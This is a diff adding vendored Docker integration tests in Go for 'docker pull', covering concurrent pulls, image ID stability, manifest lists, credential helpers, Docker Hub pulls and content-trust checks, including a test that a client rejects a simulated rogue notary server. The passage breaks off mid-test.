+func testConcurrentPullMultipleTags(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"recent", "fresh", "todays"} { + repo := fmt.Sprintf("%v:%v", repoName, tag) + _, err := buildImage(repo, fmt.Sprintf(` + FROM busybox + ENTRYPOINT ["/bin/echo"] + ENV FOO foo + ENV BAR bar + CMD echo %s + `, repo), true) + c.Assert(err, checker.IsNil) + dockerCmd(c, "push", repo) + repos = append(repos, repo) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) + + // Re-pull individual tags, in parallel + results := make(chan error) + + for _, repo := range repos { + go func(repo string) { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repo)) + results <- err + }(repo) + } + + // These checks are separate from the loop above because the check + // package is not goroutine-safe. + for range repos { + err := <-results + c.Assert(err, checker.IsNil, check.Commentf("concurrent pull failed with error: %v", err)) + } + + // Ensure all tags were pulled successfully + for _, repo := range repos { + dockerCmd(c, "inspect", repo) + out, _ := dockerCmd(c, "run", "--rm", repo) + c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo) + } +} + +func (s *DockerRegistrySuite) TestConcurrentPullMultipleTags(c *check.C) { + testConcurrentPullMultipleTags(c) +} + +func (s *DockerSchema1RegistrySuite) TestConcurrentPullMultipleTags(c *check.C) { + testConcurrentPullMultipleTags(c) +} + +// testPullIDStability verifies that pushing an image and pulling it back +// preserves the image ID. 
+func testPullIDStability(c *check.C) { + derivedImage := privateRegistryURL + "/dockercli/id-stability" + baseImage := "busybox" + + _, err := buildImage(derivedImage, fmt.Sprintf(` + FROM %s + ENV derived true + ENV asdf true + RUN dd if=/dev/zero of=/file bs=1024 count=1024 + CMD echo %s + `, baseImage, derivedImage), true) + if err != nil { + c.Fatal(err) + } + + originalID, err := getIDByName(derivedImage) + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + dockerCmd(c, "push", derivedImage) + + // Pull + out, _ := dockerCmd(c, "pull", derivedImage) + if strings.Contains(out, "Pull complete") { + c.Fatalf("repull redownloaded a layer: %s", out) + } + + derivedIDAfterPull, err := getIDByName(derivedImage) + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + + if derivedIDAfterPull != originalID { + c.Fatal("image's ID unexpectedly changed after a repush/repull") + } + + // Make sure the image runs correctly + out, _ = dockerCmd(c, "run", "--rm", derivedImage) + if strings.TrimSpace(out) != derivedImage { + c.Fatalf("expected %s; got %s", derivedImage, out) + } + + // Confirm that repushing and repulling does not change the computed ID + dockerCmd(c, "push", derivedImage) + dockerCmd(c, "rmi", derivedImage) + dockerCmd(c, "pull", derivedImage) + + derivedIDAfterPull, err = getIDByName(derivedImage) + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + + if derivedIDAfterPull != originalID { + c.Fatal("image's ID unexpectedly changed after a repush/repull") + } + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + + // Make sure the image still runs + out, _ = dockerCmd(c, "run", "--rm", derivedImage) + if strings.TrimSpace(out) != derivedImage { + c.Fatalf("expected %s; got %s", derivedImage, out) + } +} + +func (s *DockerRegistrySuite) TestPullIDStability(c *check.C) { + testPullIDStability(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullIDStability(c *check.C) { + testPullIDStability(c) +} + +// #21213 +func 
testPullNoLayers(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/scratch", privateRegistryURL) + + _, err := buildImage(repoName, ` + FROM scratch + ENV foo bar`, + true) + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + dockerCmd(c, "pull", repoName) +} + +func (s *DockerRegistrySuite) TestPullNoLayers(c *check.C) { + testPullNoLayers(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullNoLayers(c *check.C) { + testPullNoLayers(c) +} + +func (s *DockerRegistrySuite) TestPullManifestList(c *check.C) { + testRequires(c, NotArm) + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // Inject a manifest list into the registry + manifestList := &manifestlist.ManifestList{ + Versioned: manifest.Versioned{ + SchemaVersion: 2, + MediaType: manifestlist.MediaTypeManifestList, + }, + Manifests: []manifestlist.ManifestDescriptor{ + { + Descriptor: distribution.Descriptor{ + Digest: "sha256:1a9ec845ee94c202b2d5da74a24f0ed2058318bfa9879fa541efaecba272e86b", + Size: 3253, + MediaType: schema2.MediaTypeManifest, + }, + Platform: manifestlist.PlatformSpec{ + Architecture: "bogus_arch", + OS: "bogus_os", + }, + }, + { + Descriptor: distribution.Descriptor{ + Digest: pushDigest, + Size: 3253, + MediaType: schema2.MediaTypeManifest, + }, + Platform: manifestlist.PlatformSpec{ + Architecture: runtime.GOARCH, + OS: runtime.GOOS, + }, + }, + }, + } + + manifestListJSON, err := json.MarshalIndent(manifestList, "", " ") + c.Assert(err, checker.IsNil, check.Commentf("error marshalling manifest list")) + + manifestListDigest := digest.FromBytes(manifestListJSON) + hexDigest := manifestListDigest.Hex() + + registryV2Path := filepath.Join(s.reg.dir, "docker", "registry", "v2") + + // Write manifest list to blob store + blobDir := filepath.Join(registryV2Path, "blobs", "sha256", hexDigest[:2], hexDigest) + err = os.MkdirAll(blobDir, 0755) + c.Assert(err, checker.IsNil, 
check.Commentf("error creating blob dir")) + blobPath := filepath.Join(blobDir, "data") + err = ioutil.WriteFile(blobPath, []byte(manifestListJSON), 0644) + c.Assert(err, checker.IsNil, check.Commentf("error writing manifest list")) + + // Add to revision store + revisionDir := filepath.Join(registryV2Path, "repositories", remoteRepoName, "_manifests", "revisions", "sha256", hexDigest) + err = os.Mkdir(revisionDir, 0755) + c.Assert(err, checker.IsNil, check.Commentf("error creating revision dir")) + revisionPath := filepath.Join(revisionDir, "link") + err = ioutil.WriteFile(revisionPath, []byte(manifestListDigest.String()), 0644) + c.Assert(err, checker.IsNil, check.Commentf("error writing revision link")) + + // Update tag + tagPath := filepath.Join(registryV2Path, "repositories", remoteRepoName, "_manifests", "tags", "latest", "current", "link") + err = ioutil.WriteFile(tagPath, []byte(manifestListDigest.String()), 0644) + c.Assert(err, checker.IsNil, check.Commentf("error writing tag link")) + + // Verify that the image can be pulled through the manifest list. + out, _ := dockerCmd(c, "pull", repoName) + + // The pull output includes "Digest: ", so find that + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + // Make sure the pushed and pull digests match + c.Assert(manifestListDigest.String(), checker.Equals, pullDigest) + + // Was the image actually created? 
+ dockerCmd(c, "inspect", repoName) + + dockerCmd(c, "rmi", repoName) +} + +// #23100 +func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithScheme(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, "https://"+privateRegistryURL) + dockerCmd(c, "--config", tmp, "pull", repoName) + + // likewise push should work + repoName2 := fmt.Sprintf("%v/dockercli/busybox:nocreds", privateRegistryURL) + dockerCmd(c, "tag", repoName, repoName2) + dockerCmd(c, "--config", tmp, "push", repoName2) + + // logout should work w scheme also because it will be stripped + dockerCmd(c, "--config", tmp, "logout", "https://"+privateRegistryURL) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuth(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + 
+ workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + dockerCmd(c, "--config", tmp, "pull", repoName) +} + +// TestRunImplicitPullWithNoTag should pull implicitly only the default tag (latest) +func (s *DockerRegistrySuite) TestRunImplicitPullWithNoTag(c *check.C) { + testRequires(c, DaemonIsLinux) + repo := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + repoTag1 := fmt.Sprintf("%v:latest", repo) + repoTag2 := fmt.Sprintf("%v:t1", repo) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoTag1) + dockerCmd(c, "tag", "busybox", repoTag2) + dockerCmd(c, "push", repo) + dockerCmd(c, "rmi", repoTag1) + dockerCmd(c, "rmi", repoTag2) + + out, _, err := dockerCmdWithError("run", repo) + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Unable to find image '%s:latest' locally", repo)) + + // There should be only one line for repo, the one with repo:latest + outImageCmd, _, err := dockerCmdWithError("images", repo) + splitOutImageCmd := 
strings.Split(strings.TrimSpace(outImageCmd), "\n") + c.Assert(splitOutImageCmd, checker.HasLen, 2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go new file mode 100644 index 0000000000..a0118a8e95 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go @@ -0,0 +1,274 @@ +package main + +import ( + "fmt" + "regexp" + "strings" + "sync" + "time" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// TestPullFromCentralRegistry pulls an image from the central registry and verifies that the client +// prints all expected output. +func (s *DockerHubPullSuite) TestPullFromCentralRegistry(c *check.C) { + testRequires(c, DaemonIsLinux) + out := s.Cmd(c, "pull", "hello-world") + defer deleteImages("hello-world") + + c.Assert(out, checker.Contains, "Using default tag: latest", check.Commentf("expected the 'latest' tag to be automatically assumed")) + c.Assert(out, checker.Contains, "Pulling from library/hello-world", check.Commentf("expected the 'library/' prefix to be automatically assumed")) + c.Assert(out, checker.Contains, "Downloaded newer image for hello-world:latest") + + matches := regexp.MustCompile(`Digest: (.+)\n`).FindAllStringSubmatch(out, -1) + c.Assert(len(matches), checker.Equals, 1, check.Commentf("expected exactly one image digest in the output")) + c.Assert(len(matches[0]), checker.Equals, 2, check.Commentf("unexpected number of submatches for the digest")) + _, err := digest.ParseDigest(matches[0][1]) + c.Check(err, checker.IsNil, check.Commentf("invalid digest %q in output", matches[0][1])) + + // We should have a single entry in images. 
+ img := strings.TrimSpace(s.Cmd(c, "images")) + splitImg := strings.Split(img, "\n") + c.Assert(splitImg, checker.HasLen, 2) + c.Assert(splitImg[1], checker.Matches, `hello-world\s+latest.*?`, check.Commentf("invalid output for `docker images` (expected image and tag name")) +} + +// TestPullNonExistingImage pulls non-existing images from the central registry, with different +// combinations of implicit tag and library prefix. +func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) { + testRequires(c, DaemonIsLinux) + + type entry struct { + repo string + alias string + tag string + } + + entries := []entry{ + {"asdfasdf", "asdfasdf", "foobar"}, + {"asdfasdf", "library/asdfasdf", "foobar"}, + {"asdfasdf", "asdfasdf", ""}, + {"asdfasdf", "asdfasdf", "latest"}, + {"asdfasdf", "library/asdfasdf", ""}, + {"asdfasdf", "library/asdfasdf", "latest"}, + } + + // The option field indicates "-a" or not. + type record struct { + e entry + option string + out string + err error + } + + // Execute 'docker pull' in parallel, pass results (out, err) and + // necessary information ("-a" or not, and the image name) to channel. + var group sync.WaitGroup + recordChan := make(chan record, len(entries)*2) + for _, e := range entries { + group.Add(1) + go func(e entry) { + defer group.Done() + repoName := e.alias + if e.tag != "" { + repoName += ":" + e.tag + } + out, err := s.CmdWithError("pull", repoName) + recordChan <- record{e, "", out, err} + }(e) + if e.tag == "" { + // pull -a on a nonexistent registry should fall back as well + group.Add(1) + go func(e entry) { + defer group.Done() + out, err := s.CmdWithError("pull", "-a", e.alias) + recordChan <- record{e, "-a", out, err} + }(e) + } + } + + // Wait for completion + group.Wait() + close(recordChan) + + // Process the results (out, err). 
+ for record := range recordChan { + if len(record.option) == 0 { + c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) + c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found: does not exist or no pull access", record.e.repo), check.Commentf("expected image not found error messages")) + } else { + // pull -a on a nonexistent registry should fall back as well + c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) + c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found", record.e.repo), check.Commentf("expected image not found error messages")) + c.Assert(record.out, checker.Not(checker.Contains), "unauthorized", check.Commentf(`message should not contain "unauthorized"`)) + } + } + +} + +// TestPullFromCentralRegistryImplicitRefParts pulls an image from the central registry and verifies +// that pulling the same image with different combinations of implicit elements of the the image +// reference (tag, repository, central registry url, ...) doesn't trigger a new pull nor leads to +// multiple images. +func (s *DockerHubPullSuite) TestPullFromCentralRegistryImplicitRefParts(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Pull hello-world from v2 + pullFromV2 := func(ref string) (int, string) { + out := s.Cmd(c, "pull", "hello-world") + v1Retries := 0 + for strings.Contains(out, "this image was pulled from a legacy registry") { + // Some network errors may cause fallbacks to the v1 + // protocol, which would violate the test's assumption + // that it will get the same images. To make the test + // more robust against these network glitches, allow a + // few retries if we end up with a v1 pull. 
+ + if v1Retries > 2 { + c.Fatalf("too many v1 fallback incidents when pulling %s", ref) + } + + s.Cmd(c, "rmi", ref) + out = s.Cmd(c, "pull", ref) + + v1Retries++ + } + + return v1Retries, out + } + + pullFromV2("hello-world") + defer deleteImages("hello-world") + + s.Cmd(c, "tag", "hello-world", "hello-world-backup") + + for _, ref := range []string{ + "hello-world", + "hello-world:latest", + "library/hello-world", + "library/hello-world:latest", + "docker.io/library/hello-world", + "index.docker.io/library/hello-world", + } { + var out string + for { + var v1Retries int + v1Retries, out = pullFromV2(ref) + + // Keep repeating the test case until we don't hit a v1 + // fallback case. We won't get the right "Image is up + // to date" message if the local image was replaced + // with one pulled from v1. + if v1Retries == 0 { + break + } + s.Cmd(c, "rmi", ref) + s.Cmd(c, "tag", "hello-world-backup", "hello-world") + } + c.Assert(out, checker.Contains, "Image is up to date for hello-world:latest") + } + + s.Cmd(c, "rmi", "hello-world-backup") + + // We should have a single entry in images. + img := strings.TrimSpace(s.Cmd(c, "images")) + splitImg := strings.Split(img, "\n") + c.Assert(splitImg, checker.HasLen, 2) + c.Assert(splitImg[1], checker.Matches, `hello-world\s+latest.*?`, check.Commentf("invalid output for `docker images` (expected image and tag name")) +} + +// TestPullScratchNotAllowed verifies that pulling 'scratch' is rejected. +func (s *DockerHubPullSuite) TestPullScratchNotAllowed(c *check.C) { + testRequires(c, DaemonIsLinux) + out, err := s.CmdWithError("pull", "scratch") + c.Assert(err, checker.NotNil, check.Commentf("expected pull of scratch to fail")) + c.Assert(out, checker.Contains, "'scratch' is a reserved name") + c.Assert(out, checker.Not(checker.Contains), "Pulling repository scratch") +} + +// TestPullAllTagsFromCentralRegistry pulls using `all-tags` for a given image and verifies that it +// results in more images than a naked pull. 
+func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) { + testRequires(c, DaemonIsLinux) + s.Cmd(c, "pull", "busybox") + outImageCmd := s.Cmd(c, "images", "busybox") + splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") + c.Assert(splitOutImageCmd, checker.HasLen, 2) + + s.Cmd(c, "pull", "--all-tags=true", "busybox") + outImageAllTagCmd := s.Cmd(c, "images", "busybox") + linesCount := strings.Count(outImageAllTagCmd, "\n") + c.Assert(linesCount, checker.GreaterThan, 2, check.Commentf("pulling all tags should provide more than two images, got %s", outImageAllTagCmd)) + + // Verify that the line for 'busybox:latest' is left unchanged. + var latestLine string + for _, line := range strings.Split(outImageAllTagCmd, "\n") { + if strings.HasPrefix(line, "busybox") && strings.Contains(line, "latest") { + latestLine = line + break + } + } + c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for busybox:latest found after pulling all tags")) + splitLatest := strings.Fields(latestLine) + splitCurrent := strings.Fields(splitOutImageCmd[1]) + + // Clear relative creation times, since these can easily change between + // two invocations of "docker images". Without this, the test can fail + // like this: + // ... obtained []string = []string{"busybox", "latest", "d9551b4026f0", "27", "minutes", "ago", "1.113", "MB"} + // ... expected []string = []string{"busybox", "latest", "d9551b4026f0", "26", "minutes", "ago", "1.113", "MB"} + splitLatest[3] = "" + splitLatest[4] = "" + splitLatest[5] = "" + splitCurrent[3] = "" + splitCurrent[4] = "" + splitCurrent[5] = "" + + c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("busybox:latest was changed after pulling all tags")) +} + +// TestPullClientDisconnect kills the client during a pull operation and verifies that the operation +// gets cancelled. 
+// +// Ref: docker/docker#15589 +func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "hello-world:latest" + + pullCmd := s.MakeCmd("pull", repoName) + stdout, err := pullCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + err = pullCmd.Start() + c.Assert(err, checker.IsNil) + + // Cancel as soon as we get some output. + buf := make([]byte, 10) + _, err = stdout.Read(buf) + c.Assert(err, checker.IsNil) + + err = pullCmd.Process.Kill() + c.Assert(err, checker.IsNil) + + time.Sleep(2 * time.Second) + _, err = s.CmdWithError("inspect", repoName) + c.Assert(err, checker.NotNil, check.Commentf("image was pulled after client disconnected")) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestPullNoCredentialsNotFound(c *check.C) { + // we don't care about the actual image, we just want to see image not found + // because that means v2 call returned 401 and we fell back to v1 which usually + // gives a 404 (in this case the test registry doesn't handle v1 at all) + out, _, err := dockerCmdWithError("pull", privateRegistryURL+"/busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error: image busybox:latest not found") +} + +// Regression test for https://github.com/docker/docker/issues/26429 +func (s *DockerSuite) TestPullLinuxImageFailsOnWindows(c *check.C) { + testRequires(c, DaemonIsWindows, Network) + _, _, err := dockerCmdWithError("pull", "ubuntu") + c.Assert(err.Error(), checker.Contains, "cannot be used on this platform") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go new file mode 100644 index 0000000000..96a42d6758 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go @@ -0,0 +1,365 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os/exec" + "strings" + "time" + + 
"github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerTrustSuite) TestTrustedPull(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-pull") + + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) + + dockerCmd(c, "rmi", repoName) + // Try untrusted pull to ensure we pushed the tag to the registry + pullCmd = exec.Command(dockerBinary, "pull", "--disable-content-trust=true", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) + +} + +func (s *DockerTrustSuite) TestTrustedIsolatedPull(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-isolated-pull") + + // Try pull (run from isolated directory without trust information) + pullCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(string(out))) + + dockerCmd(c, "rmi", repoName) +} + +func (s *DockerTrustSuite) TestUntrustedPull(c *check.C) { + repoName := fmt.Sprintf("%v/dockercliuntrusted/pulltest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + // Try trusted pull on untrusted tag + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: 
remote trust data does not exist", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestPullWhenCertExpired(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := s.setupTrustedImage(c, "trusted-cert-expired") + + // Certificates have 10 years of expiration + elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf(out)) + }) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", "--disable-content-trust", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) + }) +} + +func (s *DockerTrustSuite) TestTrustedPullFromBadTrustServer(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclievilpull/trusted:latest", privateRegistryURL) + evilLocalConfigDir, err := ioutil.TempDir("", "evil-local-config-dir") + if err != nil { + c.Fatalf("Failed to create local temp dir") + } + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) + dockerCmd(c, "rmi", repoName) + + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, 
check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) + dockerCmd(c, "rmi", repoName) + + // Kill the notary server, start a new "evil" one. + s.not.Close() + s.not, err = newTestNotary(c) + + c.Assert(err, check.IsNil, check.Commentf("Restarting notary server failed.")) + + // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. + // tag an image and upload it to the private registry + dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) + + // Push up to the new server + pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) + + // Now, try pulling with the original client from this new trust server. This should fail because the new root is invalid. 
+ pullCmd = exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + if err == nil { + c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) + } + if !strings.Contains(out, "could not rotate trust to a new trusted root") { + c.Fatalf("Missing expected output on trusted pull:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestTrustedPullWithExpiredSnapshot(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppull/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) + + dockerCmd(c, "rmi", repoName) + + // Snapshots last for three years. 
This should be expired + fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) + + runAtDifferentDate(fourYearsLater, func() { + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf("Missing expected error running trusted pull with expired snapshots")) + c.Assert(string(out), checker.Contains, "repository out-of-date", check.Commentf(out)) + }) +} + +func (s *DockerTrustSuite) TestTrustedOfflinePull(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-offline-pull") + + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "error contacting notary server", check.Commentf(out)) + // Do valid trusted pull to warm cache + pullCmd = exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) + + dockerCmd(c, "rmi", repoName) + + // Try pull again with invalid notary server, should use cache + pullCmd = exec.Command(dockerBinary, "pull", repoName) + s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPullDelete(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, "trusted-pull-delete") + // tag the image and upload it to the private registry + _, err := buildImage(repoName, ` + FROM busybox + CMD echo trustedpulldelete + `, true) + + pushCmd := exec.Command(dockerBinary, "push", repoName) 
+ s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + if out, status := dockerCmd(c, "rmi", repoName); status != 0 { + c.Fatalf("Error removing image %q\n%s", repoName, out) + } + + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + imageID := inspectField(c, repoName, "Id") + + imageByDigest := repoName + "@" + pullDigest + byDigestID := inspectField(c, imageByDigest, "Id") + + c.Assert(byDigestID, checker.Equals, imageID) + + // rmi of tag should also remove the digest reference + dockerCmd(c, "rmi", repoName) + + _, err = inspectFieldWithError(imageByDigest, "Id") + c.Assert(err, checker.NotNil, check.Commentf("digest reference should have been removed")) + + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +func (s *DockerTrustSuite) TestTrustedPullReadsFromReleasesRole(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclireleasesdelegationpulling/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + + // Push with targets first, initializing the repo + dockerCmd(c, "tag", "busybox", targetName) + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.assertTargetInRoles(c, repoName, "latest", "targets") + + // Try pull, check 
